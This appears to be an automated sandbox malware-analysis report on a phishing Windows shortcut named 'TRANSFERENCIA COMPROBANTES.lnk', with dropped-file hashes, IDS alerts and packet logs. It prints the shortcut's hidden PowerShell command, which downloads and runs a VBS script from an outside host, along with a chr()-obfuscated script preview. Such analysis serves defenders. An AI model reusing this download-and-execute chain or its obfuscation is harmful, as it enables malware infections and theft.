                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):344303
                                                                                                                                                Entropy (8bit):5.023195898304535
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                                                                                                                                MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                                                                                                                                SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                                                                                                                                SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                                                                                                                                SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):250983
                                                                                                                                                Entropy (8bit):5.057714239438731
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                                                                                                                                MD5:F883B260A8D67082EA895C14BF56DD56
                                                                                                                                                SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                                                                                                                                SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                                                                                                                                SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):51826
                                                                                                                                                Entropy (8bit):5.541375256745271
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                                                                                                                                MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                                                                                                                                SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                                                                                                                                SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                                                                                                                                SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):47296
                                                                                                                                                Entropy (8bit):6.42327948041841
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                                                                                                                                MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                                                                                                                                SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                                                                                                                                SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                                                                                                                                SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):34415
                                                                                                                                                Entropy (8bit):7.352974342178997
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                                                                                                                                MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                                                                                                                                SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                                                                                                                                SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                                                                                                                                SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3465076
                                                                                                                                                Entropy (8bit):7.898517227646252
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                                                                                                                                MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                                                                                                                                SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                                                                                                                                SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                                                                                                                                SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):24
                                                                                                                                                Entropy (8bit):2.9993896755123957
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:QDOLRMlW8Gn:Q6VMlW8G
                                                                                                                                                MD5:01FBC8EAAB7AC6E4BAE9C8BFF8577681
                                                                                                                                                SHA1:230A2E20F1CAFBEDDE01063CBA0FB40C81D1C966
                                                                                                                                                SHA-256:867B47C3C977F07C1905B3FBC883983FDF02E7F389AE7FA999B3CFCA7F5A2867
                                                                                                                                                SHA-512:AB1021D58DB2E32AA2137E399594609C65BD08D9A25FDDCD3E7028FF8989B6F42725C07CB443645D7916B2740989A83237359C242883E1EFC6E05E3FA989CABD
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..f.r.o.n.t.d.e.s.k.....
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5388
                                                                                                                                                Entropy (8bit):3.4341815626933703
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:sqaWqJpmo9JUJlbrYvpl6KSogZohJgJa7rYvplJKSogZohJgJO1:+TMvrYvpuHqrYvpHHK
                                                                                                                                                MD5:5E5064DC720900A59E8DA4A8A477554B
                                                                                                                                                SHA1:0AEAD6D4C536781919FA36CD8E913EDB310DA76D
                                                                                                                                                SHA-256:6966613A2E70F09CD8AFE2160EB8EF6081F600FDB228F3CFF62175115DCD92AB
                                                                                                                                                SHA-512:6DC496C1AF339C7C056ECC279636A051ADA90C8C3880594543FD17982927522A65F9890006DE12F910AC38761E31582349F87CC790884CB9C3B08DA878B4BB1F
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:...................................FL..................F.`.. ......2a.....V..I.......I...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&........*_....7.3a.....V..I......2......Y.. .TRANSF~1.LNK..n......EW.>.Y............................>...T.R.A.N.S.F.E.R.E.N.C.I.A. .C.O.M.P.R.O.B.A.N.T.E.S...l.n.k.......h...............-.......g...........>}hD.....C:\Users\user\Desktop\TRANSFERENCIA COMPROBANTES.lnk....c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.c.o.n.s.e.n.t...e.x.e.........%SystemRoot%\system32\consent.exe...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.c.o.n.s.e.n.t...e.x.e.......................................................................................................................................................................
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):177664
                                                                                                                                                Entropy (8bit):7.757333394091002
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:/Qv8/m8hRr4ZWmhtRGKTCaWzUp0jxrZmHM26XF1g39JZY6Rd:/k83r4MmhvGKTpa1tXUJLd
                                                                                                                                                MD5:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                SHA1:03F03C5B5D8CF362AA52B9E793E7BE398D779C21
                                                                                                                                                SHA-256:639135EB69333ABA7ECB762072D8BEF1D2DB83E54EDBE627DD223039142B8C91
                                                                                                                                                SHA-512:74048463606F7017BD8BD3C92773EDDE5A406247C5EA437B8EE580A3D9E65EB755AA44DE466FC2AABEF8B9A67C40163AFEB3DF9BC9FB35F8AFE20814D5DE85B5
                                                                                                                                                Malicious:true
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: TRANSFERENCIA COMPROBANTES.lnk, Detection: malicious, Browse
                                                                                                                                                • Filename: Transferencia.lnk, Detection: malicious, Browse
                                                                                                                                                • Filename: dHrrqccwkL.doc, Detection: malicious, Browse
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....sVg................................ ........@.. ....................................`.....................................S.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......0a..h\..........................................................f#........X...B..4.d........r.).#..P..J. Og$..7&.\....Y^.._..H...f..+..........k.....&.*!g..>Y...O=x........&L.8.Y....1........I.D9p.QR..I..Z.-%.].-.'.z..P....."..$........j,..AHz...5..6..7.'.....Li$.^u\F.X.....V2..^.....*#^.X.u@.p...^....' .r.dQ..xR..v>u.C.m8.....>)..0lk.E...#..3a..u...:........[7..Z.w#....'F..r..N.s....X.Z...bl.......1.;..*..D.JA-d....G..(..|.N.q.W.|.U...X
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):177664
                                                                                                                                                Entropy (8bit):7.757333394091002
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:/Qv8/m8hRr4ZWmhtRGKTCaWzUp0jxrZmHM26XF1g39JZY6Rd:/k83r4MmhvGKTpa1tXUJLd
                                                                                                                                                MD5:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                SHA1:03F03C5B5D8CF362AA52B9E793E7BE398D779C21
                                                                                                                                                SHA-256:639135EB69333ABA7ECB762072D8BEF1D2DB83E54EDBE627DD223039142B8C91
                                                                                                                                                SHA-512:74048463606F7017BD8BD3C92773EDDE5A406247C5EA437B8EE580A3D9E65EB755AA44DE466FC2AABEF8B9A67C40163AFEB3DF9BC9FB35F8AFE20814D5DE85B5
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....sVg................................ ........@.. ....................................`.....................................S.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......0a..h\..........................................................f#........X...B..4.d........r.).#..P..J. Og$..7&.\....Y^.._..H...f..+..........k.....&.*!g..>Y...O=x........&L.8.Y....1........I.D9p.QR..I..Z.-%.].-.'.z..P....."..$........j,..AHz...5..6..7.'.....Li$.^u\F.X.....V2..^.....*#^.X.u@.p...^....' .r.dQ..xR..v>u.C.m8.....>)..0lk.E...#..3a..u...:........[7..Z.w#....'F..r..N.s....X.Z...bl.......1.;..*..D.JA-d....G..(..|.N.q.W.|.U...X
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with very long lines (10361), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):10363
                                                                                                                                                Entropy (8bit):4.215183366705786
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:5yOUEFQdd+BHBHtuQoBkUfIk93lGQNdsFu/0nymvsWk+HvzES5Rm5aVK+8:5hF68GH5RlGQsFu/fkMYv8
                                                                                                                                                MD5:087BCEF76143B81090DEEF4EE4679995
                                                                                                                                                SHA1:6EBD4FD212D0583157AE03BB0EB5841C53E281FC
                                                                                                                                                SHA-256:87334EB3F39CFFDFEED453F67A7C338FE378B75C49946451CA1A0E4E151BBA00
                                                                                                                                                SHA-512:B2F93705760D4D1CF5FE0AC354100916D16B6C4FD62117254238A600AABE6257FC791F1CE498BD2D0CFDD47E19F304DC5A68A06B7958658F34859AFAA582ED4D
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:Execute(chr(49+34)& chr(195-94)& chr(166-50)& chr(129-97)& chr(194-83)& chr(11+87)& chr(133-27)& chr(105-18)& chr(5670/54)& chr(174-64)& chr(7+65)& chr(4060/35)& chr(60+56)& chr(16*7)& chr(116-84)& chr(2013/33)& chr(-48+80)& chr(10+57)& chr(5814/51)& chr(24+77)& chr(117-20)& chr(190-74)& chr(7070/70)& chr(4661/59)& chr(170-72)& chr(121-15)& chr(70+31)& chr(41+58)& chr(7656/66)& chr(8+32)& chr(19+15)& chr(71+16)& chr(5355/51)& chr(173-63)& chr(25+47)& chr(41+75)& chr(72+44)& chr(8624/77)& chr(99-53)& chr(130-43)& chr(190-85)& chr(83+27)& chr(-27+99)& chr(147-31)& chr(33+83)& chr(206-94)& chr(4182/51)& chr(110-9)& chr(182-69)& chr(5850/50)& chr(116-15)& chr(61+54)& chr(74+42)& chr(-47+93)& chr(147-94)& chr(43+3)& chr(72-23)& chr(272/8)& chr(1*41)& chr(600/60)& chr(103-18)& chr(169-87)& chr(1748/23)& chr(-60+92)& chr(793/13)& chr(1600/50)& chr(-57+91)& chr(22+82)& chr(2*58)& chr(183-67)& chr(13+99)& chr(211-96)& chr(122-64)& chr(10+37)& chr(83-36)& chr(6664/56)& chr(10234/86)& chr(8449/71
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):55
                                                                                                                                                Entropy (8bit):4.306461250274409
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                File type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=0, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                                                                Entropy (8bit):2.815973144862974
                                                                                                                                                TrID:
                                                                                                                                                • Windows Shortcut (20020/1) 100.00%
                                                                                                                                                File name:TRANSFERENCIA COMPROBANTES.lnk
                                                                                                                                                File size:2'498 bytes
                                                                                                                                                MD5:e03e7eeb288c1f96bb336fe0bfa4cb95
                                                                                                                                                SHA1:e2a53c23480aad659723ee5c8542105955787ac1
                                                                                                                                                SHA256:a43b59c54921c6b5cc272e0af9917b5973231de9b6d183be381c1820416ce49f
                                                                                                                                                SHA512:c142377b9ad169f06e62836c4152b916bfff5b4d64487005fcca5dc2d213a9aeaa5a8d6d2fcfbbbbc13b6016aaf9c4ff0b108cff3af98d28cc85d1502478ce2a
                                                                                                                                                SSDEEP:24:8z/BHYVKVWTAZ/+/CWd0G2z2EDe2PE+rmIKvrhV9QOfe4o0t5/:8z5aMFz2IeOE+fKv9V9QmoI
                                                                                                                                                TLSH:C451F71429F51718F6F78F392879A350C876BD59FD66CB8C0150818C2C21710E9B5F3B
                                                                                                                                                File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
                                                                                                                                                Icon Hash:74f0e4e4e4e1e1ed

                                                                                                                                                General

                                                                                                                                                Relative Path:..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                Command Line Argument:-ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';
                                                                                                                                                Icon location:c:\windows\system32\consent.exe
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-09T06:52:28.060737+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49701 | 94.156.167.57 | 443 | TCP
2024-12-09T06:52:37.409124+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49728 | 52.123.243.181 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                Dec 9, 2024 06:52:29.157318115 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.175908089 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.175930023 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.175997019 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.176002979 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.176042080 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.196603060 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.196633101 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.196693897 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.196700096 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.196738005 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.215128899 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.215151072 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.215209961 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.215217113 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.215276003 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.229198933 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.229226112 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.229285002 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.229311943 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.229455948 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.242258072 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.242278099 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.242337942 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.242345095 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.242482901 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.352291107 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.352314949 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.352385044 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.352396011 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.352454901 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.354020119 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.354079008 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.354084015 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.354099035 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.354119062 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.354152918 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.354192019 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.354207039 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.354228020 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.354233027 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:35.063589096 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:35.063630104 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:35.063697100 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:35.065378904 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:35.065402031 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:35.313007116 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:35.313051939 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:35.313116074 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:35.313791037 CET49728443192.168.2.752.123.243.181
                                                                                                                                                Dec 9, 2024 06:52:35.313803911 CET4434972852.123.243.181192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:36.437566996 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:36.437659979 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:36.444946051 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:36.444963932 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:36.445225000 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:36.445307970 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:36.447077036 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:36.487338066 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.138668060 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.138705969 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.138729095 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.138814926 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.138816118 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.138844013 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.138894081 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.192826986 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.192856073 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.192929983 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.192946911 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.192965984 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.192990065 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.338624001 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.338649988 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.338710070 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.338732004 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.338771105 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.338779926 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.367867947 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.367897987 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.367970943 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.368005037 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.368022919 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.368186951 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:37.400264025 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.400291920 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:37.400346994 CET49727443192.168.2.794.156.167.57
